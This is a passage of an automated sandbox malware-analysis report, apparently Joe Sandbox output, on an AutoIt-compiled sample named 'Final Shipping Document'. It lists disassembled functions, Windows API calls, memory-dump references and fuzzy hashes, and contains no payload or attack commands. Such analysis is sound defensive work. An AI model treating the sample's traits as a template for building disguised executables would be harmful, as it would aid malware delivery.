                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: __wsopen_s
                                                            • String ID:
                                                            • API String ID: 3347428461-0
                                                            • Opcode ID: 289625f387150c380de3b1124fda8b40cd4b4d0077313bfcb0522dba657b4a0c
                                                            • Instruction ID: a6736b1b8189ca2027441526837aacce89d638ad8d93be51d880dbf9cb11cfb4
                                                            • Opcode Fuzzy Hash: 289625f387150c380de3b1124fda8b40cd4b4d0077313bfcb0522dba657b4a0c
                                                            • Instruction Fuzzy Hash: 5B11187590410AAFCB05DF58E941A9EBBF5EF48315F10409AF808AB312EB31EA11CBA5
                                                            Function 00BA9A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00BA543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00BA9A9C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 53cd387e20cc0ad84c4ee7a0e768ad6c5db2a1a546e13cd2c4b2362cee6f5992
                                                            • Instruction ID: 132e2352af4a6742c572d085a6bbd15dcd16b2205974e78199341ac7fa8ae82e
                                                            • Opcode Fuzzy Hash: 53cd387e20cc0ad84c4ee7a0e768ad6c5db2a1a546e13cd2c4b2362cee6f5992
                                                            • Instruction Fuzzy Hash: 7B114832208B059FD720CF15C880B66B7F9EF45764F10C46EE9AB8AA51C770F945EB60
                                                            Function 00BCE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                            • Instruction ID: 8fa45faa1acfc3a790a104d441f2be8ecb1f430999cbf6bab9cfffb3cfd8efc4
                                                            • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                            • Instruction Fuzzy Hash: 49F0D136521A10D6C6312A799C05F5A73DC9F62331F1007FEF431962D2EB74E80186A5
                                                            Function 00BD3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 9c5f78b3427383a38971572370fc9e293e072ed864d10e9fe537db0d597398e6
                                                            • Instruction ID: d19fa98aff6c437292b558cb8e5c1af4a9c25df0d1667f0b69002c638c3dbce3
                                                            • Opcode Fuzzy Hash: 9c5f78b3427383a38971572370fc9e293e072ed864d10e9fe537db0d597398e6
                                                            • Instruction Fuzzy Hash: 40E0E53120062596D72126669C00F9EBACAEB42FB0F0900E6BC0496692FB52DE01A3E2
                                                            Function 00BA4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4F6D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 04fdcc3eb9afffdf4ee60d1aedf11d51fcba5f06e99f2a16c6990c654fc0c756
                                                            • Instruction ID: 21500f50dec0f38ffafcb2b33b58966c143d6ea654afe4d58f5d4c4c1a1df0a6
                                                            • Opcode Fuzzy Hash: 04fdcc3eb9afffdf4ee60d1aedf11d51fcba5f06e99f2a16c6990c654fc0c756
                                                            • Instruction Fuzzy Hash: AFF0A971009342CFCB348F20D4D0926BBE0EF4232932099BEE1EE82620C7B29844EF00
                                                            Function 00BA2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BA2DC4
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_wcslen
                                                            • String ID:
                                                            • API String ID: 541455249-0
                                                            • Opcode ID: 97b150eb587755d5b6787e175e2ad53dc8c3040c95d2b7ac1c4fd9cc4d802c97
                                                            • Instruction ID: 7ff2aad9927b9c32ef9265d81173c0603f1f13ea7cd3baeb5a507e829f469df2
                                                            • Opcode Fuzzy Hash: 97b150eb587755d5b6787e175e2ad53dc8c3040c95d2b7ac1c4fd9cc4d802c97
                                                            • Instruction Fuzzy Hash: BCE0C2B2A042245BCB21A2989C06FEE77EDDFC8790F0400B1FD09E7248DA70AD8086A0
                                                            Function 00C12693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                            • Instruction ID: 73931d5e4961ea489cebaffdaf34732921d92e89d4ee116c9e83bb36f9ad8383
                                                            • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                            • Instruction Fuzzy Hash: AEE048B46097005FDF395A28A8517F677D49F4A300F00045EF5AB82352E5726855964D
                                                            Function 00BA2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BA3908
                                                              • Part of subcall function 00BAD730: GetInputState.USER32 ref: 00BAD807
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00BA2B6B
                                                              • Part of subcall function 00BA30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BA314E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                            • String ID:
                                                            • API String ID: 3667716007-0
                                                            • Opcode ID: e2f64e3a5cd8b4a281418dcec9ac47b860a156821fb4ecfade232dc197ec6bfd
                                                            • Instruction ID: 0dfa7a4822861e06f2200394e4163edca7e75a1fda7a277f46385f1528906e64
                                                            • Opcode Fuzzy Hash: e2f64e3a5cd8b4a281418dcec9ac47b860a156821fb4ecfade232dc197ec6bfd
                                                            • Instruction Fuzzy Hash: E0E0863230C24407CA08BB78A8566BDA7D9DBD3751F4455BEF54753162CE2549494351
                                                            Function 00BE039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,00BE0704,?,?,00000000,?,00BE0704,00000000,0000000C), ref: 00BE03B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: d78bbfb6294b15b031dc30e3127ac009dde8d443daf58e21cdd09328d1cad1d2
                                                            • Instruction ID: 3cc84f7dd9126b4b376c48b0668a263ad53a2109b4972fa5bb7d7412beff5882
                                                            • Opcode Fuzzy Hash: d78bbfb6294b15b031dc30e3127ac009dde8d443daf58e21cdd09328d1cad1d2
                                                            • Instruction Fuzzy Hash: F2D06C3205010DBBDF028F84DD46EDE3BAAFB48714F014000BE1866020C732E821AB90
                                                            Function 00BA1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00BA1CBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem
                                                            • String ID:
                                                            • API String ID: 3098949447-0
                                                            • Opcode ID: 7709a27e67345eca47b616fb774b9322a94496ac67a05e789f7669d6458fb733
                                                            • Instruction ID: 3610ffe388d51e4f088d85643309c2dd117da9d5fd5c58a8e247d8c4b16269eb
                                                            • Opcode Fuzzy Hash: 7709a27e67345eca47b616fb774b9322a94496ac67a05e789f7669d6458fb733
                                                            • Instruction Fuzzy Hash: 8DC09B36290304DFF3144B94BC4AF1C7754A348B00F044001F64D655F3C3A11450F750
                                                            Function 00BFD8DD Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNELBASE(00000104,?), ref: 00BFD8E9
                                                              • Part of subcall function 00BA33A7: _wcslen.LIBCMT ref: 00BA33AB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: PathTemp_wcslen
                                                            • String ID:
                                                            • API String ID: 1974555822-0
                                                            • Opcode ID: 65ec347b5008c6d053f39a7dc5b0550d07da16e554b94fd96a6e4a252da036b9
                                                            • Instruction ID: 1f82fd5e859fa36f4e80ab81f0ac15383979f63480050d36c8ccd6fdfe41aab6
                                                            • Opcode Fuzzy Hash: 65ec347b5008c6d053f39a7dc5b0550d07da16e554b94fd96a6e4a252da036b9
                                                            • Instruction Fuzzy Hash: 0EC04C7451501E9BDB909790CCC9BBD73A4EF00701F1040D5F205510509E715A489B12
                                                            Function 00C1744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BA949C,?,00008000), ref: 00BA5773
                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 00C176DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorFileLast
                                                            • String ID:
                                                            • API String ID: 1214770103-0
                                                            • Opcode ID: 53ef001b14f12405d71d1e56e7fea8e8bc0c9d63905107e97025a231107c4c2f
                                                            • Instruction ID: d37116860e8317b45dde097dc74cd136926e98896a0ab53a70a60515c092b09b
                                                            • Opcode Fuzzy Hash: 53ef001b14f12405d71d1e56e7fea8e8bc0c9d63905107e97025a231107c4c2f
                                                            • Instruction Fuzzy Hash: 858181306087019FCB14EF28C491BA9B7F1BF8A350F04465DF8965B292DB34EE85DB92
                                                            Function 00BBFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 182fe8f8996360e5b2391b347e9a4fb8961b35c0c630172aea8f7baf5e4578f7
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: 6B31BD75A0010A9BC718CF59D880AB9FBE6FB49300B2486F5E809CB656D771EDC1CB80
                                                            Function 015722A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 015722B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2039525570.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1570000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: e8fd304faee604f5393d9c74ca68dc5af2384747cb2c40a538df131ad6dd5527
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 95E0E67494010EDFDB00EFB4D54969E7FB4FF04301F100161FD05D2281D6309D508A72

                                                            Non-executed Functions

                                                            Function 00C39576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C3961A
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C3965B
                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C3969F
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C396C9
                                                            • SendMessageW.USER32 ref: 00C396F2
                                                            • GetKeyState.USER32(00000011), ref: 00C3978B
                                                            • GetKeyState.USER32(00000009), ref: 00C39798
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C397AE
                                                            • GetKeyState.USER32(00000010), ref: 00C397B8
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C397E9
                                                            • SendMessageW.USER32 ref: 00C39810
                                                            • SendMessageW.USER32(?,00001030,?,00C37E95), ref: 00C39918
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C3992E
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C39941
                                                            • SetCapture.USER32(?), ref: 00C3994A
                                                            • ClientToScreen.USER32(?,?), ref: 00C399AF
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C399BC
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C399D6
                                                            • ReleaseCapture.USER32 ref: 00C399E1
                                                            • GetCursorPos.USER32(?), ref: 00C39A19
                                                            • ScreenToClient.USER32(?,?), ref: 00C39A26
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C39A80
                                                            • SendMessageW.USER32 ref: 00C39AAE
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C39AEB
                                                            • SendMessageW.USER32 ref: 00C39B1A
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C39B3B
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C39B4A
                                                            • GetCursorPos.USER32(?), ref: 00C39B68
                                                            • ScreenToClient.USER32(?,?), ref: 00C39B75
                                                            • GetParent.USER32(?), ref: 00C39B93
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C39BFA
                                                            • SendMessageW.USER32 ref: 00C39C2B
                                                            • ClientToScreen.USER32(?,?), ref: 00C39C84
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C39CB4
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C39CDE
                                                            • SendMessageW.USER32 ref: 00C39D01
                                                            • ClientToScreen.USER32(?,?), ref: 00C39D4E
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C39D82
                                                              • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C39E05
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                            • String ID: @GUI_DRAGID$F
                                                            • API String ID: 3429851547-4164748364
                                                            • Opcode ID: 3df74d4563ddc5ca1a98571fa8d6d019600d32d5bf2b6da34b7487a93eee6d5d
                                                            • Instruction ID: 44eb61b8c8d0c5f2ad4016222db4732a933fbf9ffb495dad83f0e73121cbfec0
                                                            • Opcode Fuzzy Hash: 3df74d4563ddc5ca1a98571fa8d6d019600d32d5bf2b6da34b7487a93eee6d5d
                                                            • Instruction Fuzzy Hash: F9429D30225600AFD724CF28CC85FAABBF5FF49310F144619FAA9972A1D7B1A950CF91
                                                            Function 00C34873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00C348F3
                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00C34908
                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00C34927
                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00C3494B
                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00C3495C
                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00C3497B
                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00C349AE
                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00C349D4
                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00C34A0F
                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C34A56
                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C34A7E
                                                            • IsMenu.USER32(?), ref: 00C34A97
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C34AF2
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C34B20
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C34B94
                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00C34BE3
                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00C34C82
                                                            • wsprintfW.USER32 ref: 00C34CAE
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C34CC9
                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00C34CF1
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C34D13
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C34D33
                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00C34D5A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
